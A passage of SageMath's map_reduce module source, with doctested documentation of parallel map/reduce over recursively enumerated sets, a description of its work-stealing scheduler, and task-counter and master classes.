sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
This is of course `\sum_{i=0}^{8} i! x^i`::
sage: sp == sum(factorial(i)*x^i for i in range(9))
True
* **Post Processing.** We now demonstrate the use of ``post_process``. We
generate the permutation as previously, but we only perform the map/reduce
computation on those of even ``len``. Of course we get the even part of the
previous generating series::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: post_process=lambda l: l if len(l) % 2 == 0 else None,
....: structure='forest',
....: enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 720*x^6 + 24*x^4 + 2*x^2 + 1
This is also useful for example to call a constructor on the generated
elements::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 5 else []),
....: post_process=lambda l: Permutation(l) if len(l) == 5 else None,
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**z.number_of_inversions()); sp
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
We get here a polynomial which is the `q`-factorial (in the variable `x`) of `5`,
that is, `\prod_{i=1}^{5} \frac{1-x^i}{1-x}`::
sage: x = polygen(ZZ)
sage: prod((1-x^i)//(1-x) for i in range(1, 6))
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
Compare::
sage: from sage.combinat.q_analogues import q_factorial
sage: q_factorial(5)
q^10 + 4*q^9 + 9*q^8 + 15*q^7 + 20*q^6 + 22*q^5 + 20*q^4 + 15*q^3 + 9*q^2 + 4*q + 1
* **Listing the objects.** One can also compute the list of objects in a
:class:`RecursivelyEnumeratedSet_forest`
using :class:`RESetMapReduce`. As an example, we compute the set of numbers
between 1 and 63, generated by their binary expansion::
sage: S = RecursivelyEnumeratedSet(
....: [1],
....: lambda l: [(l<<1)|0, (l<<1)|1] if l < 1<<5 else [],
....: structure='forest',
....: enumeration='depth')
Here is the list computed without :class:`RESetMapReduce`::
sage: serial = list(S)
sage: serial
[1, 2, 4, 8, 16, 32, 33, 17, 34, 35, 9, 18, 36, 37, 19, 38, 39, 5, 10,
20, 40, 41, 21, 42, 43, 11, 22, 44, 45, 23, 46, 47, 3, 6, 12, 24, 48,
49, 25, 50, 51, 13, 26, 52, 53, 27, 54, 55, 7, 14, 28, 56, 57, 29, 58,
59, 15, 30, 60, 61, 31, 62, 63]
Here is how to perform the parallel computation. The order of the lists
depends on the synchronisation of the various computation processes and
therefore should be considered as random::
sage: parall = S.map_reduce(lambda x: [x], lambda x, y: x + y, [])
sage: parall # random
[1, 3, 7, 15, 31, 63, 62, 30, 61, 60, 14, 29, 59, 58, 28, 57, 56, 6, 13,
27, 55, 54, 26, 53, 52, 12, 25, 51, 50, 24, 49, 48, 2, 5, 11, 23, 47,
46, 22, 45, 44, 10, 21, 43, 42, 20, 41, 40, 4, 9, 19, 39, 38, 18, 37,
36, 8, 17, 35, 34, 16, 33, 32]
sage: sorted(serial) == sorted(parall)
True
.. _advanced-use:
Advanced use
------------
Fine control over the execution of a map/reduce computation is achieved
via parameters passed to the :meth:`RESetMapReduce.run` method.
The following three parameters can be used:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``reduce_locally`` -- whether the workers should reduce their work
locally or send results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
Here is an example of how to deal with a timeout::
sage: from sage.parallel.map_reduce import (RESetMPExample, AbortError)
sage: EX = RESetMPExample(maxl=100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: EX = RESetMPExample(maxl=8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
As for ``reduce_locally``, one should not see any difference, except for speed
during normal usage. Most of the time one should leave it set to ``True``,
unless one sets up a mechanism to consume the partial results as soon as they
arrive. See :class:`RESetParallelIterator` and in particular the ``__iter__``
method for an example of consumer use.
.. _profiling:
Profiling
---------
It is possible to profile a map/reduce computation. First we create a
:class:`RESetMapReduce` object::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
The profiling is activated by the ``profile`` parameter. The value provided
should be a prefix (including a possible directory) for the profile dump::
sage: prof = tmp_dir('RESetMR_profile') + 'profcomp'
sage: res = S.run(profile=prof) # random
[RESetMapReduceWorker-1:58] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp1
...
[RESetMapReduceWorker-1:57] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp0
...
sage: res
131071
In this example, the profiles have been dumped in files such as
``profcomp0``. One can then load and print them as follows. See
:class:`cProfile.Profile` for more details::
sage: import cProfile, pstats
sage: st = pstats.Stats(prof+'0')
sage: st.strip_dirs().sort_stats('cumulative').print_stats() # random
...
Ordered by: cumulative time
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.023 0.023 0.432 0.432 map_reduce.py:1211(run_myself)
11968 0.151 0.000 0.223 0.000 map_reduce.py:1292(walk_branch_locally)
...
<pstats.Stats instance at 0x7fedea40c6c8>
.. SEEALSO::
`The Python Profilers <https://docs.python.org/2/library/profile.html>`_
for more detail on profiling in python.
.. _logging:
Logging
-------
The computation progress is logged through a :class:`logging.Logger` in
``sage.parallel.map_reduce.logger`` together with :class:`logging.StreamHandler`
and a :class:`logging.Formatter`. They are currently configured to print
warning messages to the console.
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
.. note::
Calls to logger which involve printing the node are commented out in the
code, because printing the node (to a string) can be very time-consuming
depending on the node, and it happens before the logger decides whether
to record the string or drop it.
.. _protocol-description:
How does it work?
------------------
The scheduling algorithm we use here is an adaptation of :wikipedia:`Work_stealing`:
In a work stealing scheduler, each processor in a computer system has a
queue of work items (computational tasks, threads) to perform. [...] Each
work item is initially put on the queue of the processor executing the
work item. When a processor runs out of work, it looks at the queues of
other processors and "steals" their work items. In effect, work stealing
distributes the scheduling work over idle processors, and as long as all
processors have work to do, no scheduling overhead occurs.
For communication we use Python's basic :mod:`multiprocessing` module. We
first describe the different actors and communication tools used by the
system. The work is done under the coordination of a **master** object (an
instance of :class:`RESetMapReduce`) by a bunch of **worker** objects
(instances of :class:`RESetMapReduceWorker`).
Each running map reduce instance works on a :class:`RecursivelyEnumeratedSet_forest` called here `C` and is
coordinated by a :class:`RESetMapReduce` object called the **master**. The
master is in charge of launching the work, gathering the results and cleaning
up at the end of the computation. It doesn't perform any computation
associated with the generation of the elements of `C`, nor with the
computation of the mapped function. It does, however, occasionally perform
a reduce, but most reducing is by default done by the workers. Also, thanks
to the work-stealing algorithm, the master is only involved in detecting the
termination of the computation; all the load balancing is done at the level
of the workers.
Workers are instances of :class:`RESetMapReduceWorker`. They are responsible
for doing the actual computations: element generation, mapping and reducing.
They are also responsible for the load balancing thanks to work-stealing.
Here is a description of the attributes of the **master** relevant to the
map-reduce protocol:
- ``_results`` -- a :class:`~multiprocessing.queues.SimpleQueue` where
the master gathers the results sent by the workers.
- ``_active_tasks`` -- a :class:`~multiprocessing.Semaphore` recording
the number of active tasks. The work is complete when it reaches 0.
- ``_done`` -- a :class:`~multiprocessing.Lock` which ensures that
shutdown is done only once.
- ``_aborted`` -- a :func:`~multiprocessing.Value` storing a shared
:class:`ctypes.c_bool` which is ``True`` if the computation was aborted
before all workers ran out of work.
- ``_workers`` -- a list of :class:`RESetMapReduceWorker` objects.
Each worker is identified by its position in this list.
Each **worker** is a process (:class:`RESetMapReduceWorker` inherits from
:class:`~multiprocessing.Process`) which contains:
- ``worker._iproc`` -- the identifier of the worker, that is, its position in the
master's list of workers
- ``worker._todo`` -- a :class:`collections.deque` storing the nodes of the
worker. It is used as a stack by the worker; thieves steal from the bottom of
this queue.
- ``worker._request`` -- a :class:`~multiprocessing.queues.SimpleQueue` storing
the steal requests submitted to ``worker``.
- ``worker._read_task``, ``worker._write_task`` -- a
:class:`~multiprocessing.queues.Pipe` used to transfer nodes during steals.
- ``worker._thief`` -- a :class:`~threading.Thread` which is in charge of
stealing from ``worker._todo``.
Here is a schematic of the architecture:
.. _figure-map_reduce_arch:
.. figure:: ../../media/map_reduce_arch.png
How thefts are performed
------------------------
During normal operation, that is, when all workers are active, a worker ``W`` is
iterating through a loop inside
:meth:`RESetMapReduceWorker.walk_branch_locally`. Work nodes are taken from,
and newly found nodes are appended to, ``W._todo``. When a worker ``W``
runs out of work, that is, when ``worker._todo`` is empty, it tries to steal
some work (i.e., a node) from another worker. This is performed in the
:meth:`RESetMapReduceWorker.steal` method.
From the point of view of ``W``, here is what happens:
- ``W`` signals to the master that it is idle: ``master._signal_task_done``;
- ``W`` chooses a victim ``V`` at random;
- ``W`` sends a request to ``V``: it puts its identifier into ``V._request``;
- ``W`` tries to read a node from ``W._read_task``. Then three things may happen:
+ a proper node is read. Then the theft was a success and ``W`` starts
working locally on the received node.
+ ``None`` is received. This means that ``V`` was idle. Then ``W`` tries
another victim.
+ :exc:`AbortError` is received. This means either that the computation was
aborted or that it simply succeeded and that no more work is required by
``W``. Therefore an :exc:`AbortError` exception is raised leading ``W`` to
shutdown.
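In code, ``W``'s side of a theft is essentially the following sketch, writing
``W`` for the stealing worker and ``master`` for the :class:`RESetMapReduce`
object (a simplification of :meth:`RESetMapReduceWorker.steal` below; logging
and statistics are omitted)::

    def steal_sketch(W, master):
        master._signal_task_done()           # W declares itself idle
        node = None
        while node is None:
            victim = master.random_worker()  # choose a victim V at random
            if victim is not W:
                victim._request.put(W._iproc)  # submit the steal request
                node = W._read_task.recv()     # blocks: a node, None, or AbortError
                if node is AbortError:
                    raise AbortError
        return node                          # W resumes local work on this node
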
We now describe the protocol on the victim's side. Each worker process contains
a :class:`~threading.Thread`, which we call ``T`` for thief, and which acts as a
kind of Trojan horse during thefts. It is normally blocked waiting for a steal
request.
From the point of view of ``V`` and ``T``, here is what happens:
- during normal time, ``T`` is blocked waiting on ``V._request``;
- upon steal request, ``T`` wakes up receiving the identification of ``W``;
- ``T`` signals to the master that a new task is starting by
``master._signal_task_start``;
- Two things may happen depending on whether the queue ``V._todo`` is empty or not.
Remark that, due to the GIL, there is no parallel execution between the
victim ``V`` and its thief thread ``T``.
+ If ``V._todo`` is empty, then ``None`` is answered on
``W._write_task``. The end of the task is immediately signaled to the master
through ``master._signal_task_done``.
+ Otherwise, a node is removed from the bottom of ``V._todo``. The node is
sent to ``W`` on ``W._write_task``. The task will be ended by ``W``, that
is, when finished working on the subtree rooted at the node, ``W`` will
call ``master._signal_task_done``.
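On the victim's side, the loop run by the thief thread ``T`` is essentially
the following sketch, writing ``V`` for the victim (a simplification of the
``_thief`` method of :class:`RESetMapReduceWorker` below)::

    def thief_sketch(V, master):
        for ireq in iter(V._request.get, AbortError):  # blocks on steal requests
            thief = master._workers[ireq]
            master._signal_task_start()        # a task may be handed over
            try:
                work = V._todo.popleft()       # steal from the bottom of V's deque
            except IndexError:                 # V has no work to give
                thief._write_task.send(None)
                master._signal_task_done()
            else:
                thief._write_task.send(work)   # the subtree now belongs to the thief
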
The end of the computation
--------------------------
To detect when a computation is finished, a synchronized integer is kept which
counts the number of active tasks. This is essentially a semaphore but
semaphores are broken on Darwin OSes so we ship two implementations depending
on the OS (see :class:`ActiveTaskCounter` and :class:`ActiveTaskCounterDarwin`
and the note below).
When a worker finishes working on a task, it calls
``master._signal_task_done``. This decreases the task counter
``master._active_tasks``. When it reaches 0, it means that there are no more
nodes: the work is completed. The worker executes ``master._shutdown``
which sends :exc:`AbortError` to all ``worker._request`` and
``worker._write_task`` queues. Each worker or thief thread receiving such
a message raises the corresponding exception, therefore stopping its work. A
lock called ``master._done`` ensures that shutdown is only done once.
Finally, it is also possible to interrupt the computation before it ends,
by calling ``master.abort()``. This is achieved by setting
``master._active_tasks`` to 0 and calling ``master._shutdown``.
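Schematically, the termination check performed by a worker when it finishes a
task reads as follows (see :meth:`RESetMapReduce._signal_task_done` below)::

    if master._active_tasks.task_done() <= 0:  # no active task remains anywhere
        master._shutdown()                     # broadcast the poison pills
        raise AbortError
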
.. warning:: The macOS Semaphore bug
Darwin OSes do not correctly implement POSIX's semaphore semantics.
Indeed, on these systems, ``acquire`` may fail and return ``False`` not only when
the semaphore is equal to zero but also **because someone else is trying
to acquire** at the same time. This makes using semaphores impossible
on macOS, so on these systems we use a synchronized integer instead.
.. _examples:
Are there examples of classes?
------------------------------
Yes! Here they are:
- :class:`RESetMPExample` -- a simple basic example
- :class:`RESetParallelIterator` -- a more advanced example using a
non-standard communication configuration.
Tests
-----
Generating series for the sum of strictly decreasing lists of integers
smaller than 15::
sage: y = polygen(ZZ, 'y')
sage: R = RESetMapReduce(
....: roots=[([], 0, 0)] + [([i], i, i) for i in range(1, 15)],
....: children=lambda list_sum_last:
....: [(list_sum_last[0] + [i], list_sum_last[1] + i, i)
....: for i in range(1, list_sum_last[2])],
....: map_function=lambda li_sum_dummy: y**li_sum_dummy[1])
sage: sg = R.run()
sage: sg == prod((1 + y**i) for i in range(1, 15))
True
Classes and methods
-------------------
"""
from __future__ import print_function, absolute_import
from threading import Thread
from sage.sets.recursively_enumerated_set import RecursivelyEnumeratedSet # _generic
from sage.misc.lazy_attribute import lazy_attribute
import collections
import copy
import sys
import random
import queue
import ctypes
import logging
logger = logging.getLogger(__name__)
logger.__doc__ = (
"""
A logger for :mod:`sage.parallel.map_reduce`
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
""")
logger.setLevel(logging.WARN)
# logger.setLevel(logging.INFO)
# logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'[%(processName)s-%(threadName)s] (%(asctime)s.%(msecs)03.f) %(message)s',
datefmt='%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
# Set up a multiprocessing context to use for this module (using the
# 'fork' method, which is basically the same as on Python 2)
import multiprocessing as mp
mp = mp.get_context('fork')
def proc_number(max_proc=None):
r"""
Return the number of processes to use.
INPUT:
- ``max_proc`` -- an upper bound on the number of processes or
``None``.
EXAMPLES::
sage: from sage.parallel.map_reduce import proc_number
sage: proc_number() # random
8
sage: proc_number(max_proc=1)
1
sage: proc_number(max_proc=2) in (1, 2)
True
"""
from sage.parallel.ncpus import ncpus
n = ncpus()
if max_proc is None:
return n
else:
return min(max_proc, n)
class AbortError(Exception):
r"""
Exception for aborting parallel computations.
This is used both as exception or as abort message.
TESTS::
sage: from sage.parallel.map_reduce import AbortError
sage: raise AbortError
Traceback (most recent call last):
...
AbortError
"""
pass
class ActiveTaskCounterDarwin(object):
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is essentially a semaphore, but Darwin OSes
do not correctly implement POSIX's semaphore semantic. So we use
a shared integer with a lock.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Value(ctypes.c_int, task_number)
self._lock = mp.Lock()
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.value)
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise it increments the counter and returns its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
with self._lock:
# The following test is not necessary but it allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks.value <= 0:
return 0
self._active_tasks.value += 1
return self._active_tasks.value
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
with self._lock:
self._active_tasks.value -= 1
return self._active_tasks.value
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
with self._lock:
self._active_tasks.value = 0
class ActiveTaskCounterPosix(object):
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is the standard implementation on POSIX
compliant OSes. We essentially wrap a semaphore.
.. note::
A legitimate question is whether there is a need to keep both
implementations. I ran the following experiment on my machine::
S = RecursivelyEnumeratedSet(
[[]],
lambda l: ([l[:i] + [len(l)] + l[i:]
for i in range(len(l) + 1)]
if len(l) < NNN else []),
structure='forest',
enumeration='depth')
%time sp = S.map_reduce(lambda z: x**len(z)); sp
For NNN = 10, averaging a dozen runs, I got:
- Posix compliant implementation: 17.04 s
- Darwin implementation: 18.26 s
So there is a non-negligible overhead. It will probably be worth it
if we try to cythonize the code. So I'm keeping both implementations.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Semaphore(task_number)
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.get_value())
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise it increments the counter and returns its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
# The following test is not necessary but it allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks._semlock._is_zero():
return 0
self._active_tasks.release()
return self._active_tasks.get_value()
task_start.__doc__ = ActiveTaskCounterDarwin.task_start.__doc__
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
# We test whether the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially set the
# semaphore to 0 to stop the computation, so this check is needed.
if not self._active_tasks.acquire(False):
return -1
return self._active_tasks.get_value()
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
while self._active_tasks.acquire(False):
pass
ActiveTaskCounter = (ActiveTaskCounterDarwin if sys.platform == 'darwin'
else ActiveTaskCounterPosix)
# ActiveTaskCounter = ActiveTaskCounterDarwin # to debug Darwin implementation
class RESetMapReduce(object):
r"""
Map-Reduce on recursively enumerated sets.
INPUT:
Description of the set:
- either ``forest=f`` -- where ``f`` is a :class:`RecursivelyEnumeratedSet_forest`
- or a triple ``roots, children, post_process`` as follows
- ``roots=r`` -- the roots of the enumeration
- ``children=c`` -- a function iterating through children nodes,
given a parent node
- ``post_process=p`` -- a post-processing function
The option ``post_process`` allows for customizing the nodes that
are actually produced. Furthermore, if ``post_process(x)`` returns ``None``,
then ``x`` won't be output at all.
Description of the map/reduce operation:
- ``map_function=f`` -- (default: ``None``)
- ``reduce_function=red`` -- (default: ``None``)
- ``reduce_init=init`` -- (default: ``None``)
.. SEEALSO::
:mod:`the Map/Reduce module <sage.parallel.map_reduce>` for
details and examples.
"""
def __init__(self,
roots=None,
children=None,
post_process=None,
map_function=None,
reduce_function=None,
reduce_init=None,
forest=None):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: R = RESetMapReduce([[]], lambda l: [[]])
sage: R
<sage.parallel.map_reduce.RESetMapReduce object at 0x...>
To silence the coverage checker::
sage: TestSuite(R).run(skip=['_test_pickling'])
"""
if forest is not None:
if not all(x is None for x in (roots, children, post_process)):
raise ValueError("forest arg is incompatible with roots, children and post_process")
self._forest = forest
self._roots = forest._roots
self.children = forest.children
if hasattr(forest, 'post_process'):
self.post_process = forest.post_process
else:
if roots is not None: self._roots = roots
if children is not None: self.children = children
if post_process is not None: self.post_process = post_process
if map_function is not None: self.map_function = map_function
if reduce_function is not None: self.reduce_function = reduce_function
if reduce_init is not None: self._reduce_init = reduce_init
self._profile = None
@lazy_attribute
def _forest(self):
r"""
Return the forest underlying the map-reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: f = EX._forest; f
An enumerated set with a forest structure
sage: f.an_element()
[]
"""
return RecursivelyEnumeratedSet(
self.roots(),
self.children,
post_process=self.post_process,
structure='forest',
enumeration='depth')
def roots(self):
r"""
Return the roots of ``self``.
OUTPUT:
An iterable of nodes.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(42)
sage: S.roots()
42
"""
return self._roots
def map_function(self, o):
r"""
Return the image of the node ``o`` under the map function of ``self``.
INPUT:
- ``o`` -- a node
OUTPUT:
By default ``1``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.map_function(7)
1
sage: S = RESetMapReduce(map_function = lambda x: 3*x + 5)
sage: S.map_function(7)
26
"""
return 1
def reduce_function(self, a, b):
r"""
Return the reduction of ``a`` and ``b`` by the reduce function of ``self``.
INPUT:
- ``a``, ``b`` -- two values to be reduced
OUTPUT:
By default the sum of ``a`` and ``b``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_function(4, 3)
7
sage: S = RESetMapReduce(reduce_function=lambda x,y: x*y)
sage: S.reduce_function(4, 3)
12
"""
return a+b
def post_process(self, a):
r"""
Return the image of ``a`` under the post-processing function for ``self``.
INPUT:
- ``a`` -- a node
With the default post-processing function, which is the identity function,
this returns ``a`` itself.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.post_process(4)
4
sage: S = RESetMapReduce(post_process=lambda x: x*x)
sage: S.post_process(4)
16
"""
return a
_reduce_init = 0
def reduce_init(self):
r"""
Return the initial element for a reduction.
.. note:: This should be overloaded in applications.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_init()
0
sage: S = RESetMapReduce(reduce_init = 2)
sage: S.reduce_init()
2
"""
return copy.copy(self._reduce_init)
def setup_workers(self, max_proc=None, reduce_locally=True):
r"""
Set up the communication channels.
INPUT:
- ``max_proc`` -- (integer) an upper bound on the number of
worker processes.
- ``reduce_locally`` -- whether the workers should reduce their work
locally or send results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: S._results
<multiprocessing.queues.Queue object at 0x...>
sage: len(S._workers)
2
"""
self._nprocess = proc_number(max_proc)
self._results = mp.Queue()
self._active_tasks = ActiveTaskCounter(self._nprocess)
self._done = mp.Lock()
self._aborted = mp.Value(ctypes.c_bool, False)
sys.stdout.flush()
sys.stderr.flush()
self._workers = [RESetMapReduceWorker(self, i, reduce_locally)
for i in range(self._nprocess)]
def start_workers(self):
r"""
Launch the workers.
The workers should have been created using :meth:`setup_workers`.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: def children(x):
....: sleep(0.5)
....: return []
sage: S = RESetMapReduce(roots=[1], children=children)
sage: S.setup_workers(2)
sage: S.start_workers()
sage: all(w.is_alive() for w in S._workers)
True
sage: sleep(1)
sage: all(not w.is_alive() for w in S._workers)
True
Cleanup::
sage: S.finish()
"""
if self._nprocess == 0:
raise ValueError("No process connected")
logger.info("Starting work with %s processes", self._nprocess)
logger.debug("Distributing tasks")
for i, task in enumerate(self.roots()):
self._workers[i % len(self._workers)]._todo.append(task)
logger.debug("Starting processes")
sys.stdout.flush()
sys.stderr.flush()
for w in self._workers: w.start()
def get_results(self, timeout=None):
r"""
Get the results from the queue.
OUTPUT:
The reduction of the results of all the workers, that is, the result of
the map/reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: for v in [1, 2, None, 3, None]: S._results.put(v)
sage: S.get_results()
6
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
res = self.reduce_init()
active_proc = self._nprocess
while active_proc > 0:
try:
logger.debug('Waiting on results; active_proc: %s, '
'timeout: %s, aborted: %s' %
(active_proc, timeout, self._aborted.value))
newres = self._results.get(timeout=timeout)
except queue.Empty:
logger.debug('Timed out waiting for results; aborting')
# If we timed out here then the abort timer should have
# already fired, but just in case it didn't (or is in
# progress) wait for it to finish
self._timer.join()
return
if newres is not None:
logger.debug("Got one result")
res = self.reduce_function(res, newres)
else:
active_proc -= 1
return res
def finish(self):
r"""
Destroy the workers and all the communication objects.
Communication statistics are gathered before destroying the workers.
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=5)
sage: S.setup_workers(2) # indirect doctest
sage: S._workers[0]._todo.append([])
sage: for w in S._workers: w.start()
sage: _ = S.get_results()
sage: S._shutdown()
sage: S.print_communication_statistics()
Traceback (most recent call last):
...
AttributeError: 'RESetMPExample' object has no attribute '_stats'
sage: S.finish()
sage: S.print_communication_statistics()
#proc: ...
...
sage: _ = S.run() # cleanup
.. SEEALSO:: :meth:`print_communication_statistics`
"""
if not self._aborted.value:
logger.debug("Joining worker processes...")
for worker in self._workers:
logger.debug("Joining %s" % worker.name)
worker.join()
logger.debug("Joining done")
else:
logger.debug("Killing worker processes...")
for worker in self._workers:
logger.debug("Terminating %s" % worker.name)
worker.terminate()
logger.debug("Killing done")
del self._results, self._active_tasks, self._done
self._get_stats()
del self._workers
def abort(self):
r"""
Abort the current parallel computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 17 else [])
sage: it = iter(S)
sage: next(it) # random
[]
sage: S.abort()
sage: hasattr(S, 'work_queue')
False
Cleanup::
sage: S.finish()
"""
logger.info("Abort called")
self._aborted.value = True
self._active_tasks.abort()
self._shutdown()
def _shutdown(self):
r"""
Shut down the workers.
Send a poison pill to all workers and their thief threads.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: for w in S._workers: w.start()
sage: S._shutdown()
Cleanup::
sage: S.finish()
"""
if self._done.acquire(False):
logger.debug("***************** FINISHED ******************")
logger.debug("Sending poison pills")
for worker in self._workers:
worker._request.put(AbortError)
for worker in self._workers:
worker._write_task.send(AbortError)
def _signal_task_start(self):
r"""
Signal a starting task.
Used by the worker to signal that a new task is starting. As soon as
there are no more active tasks, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
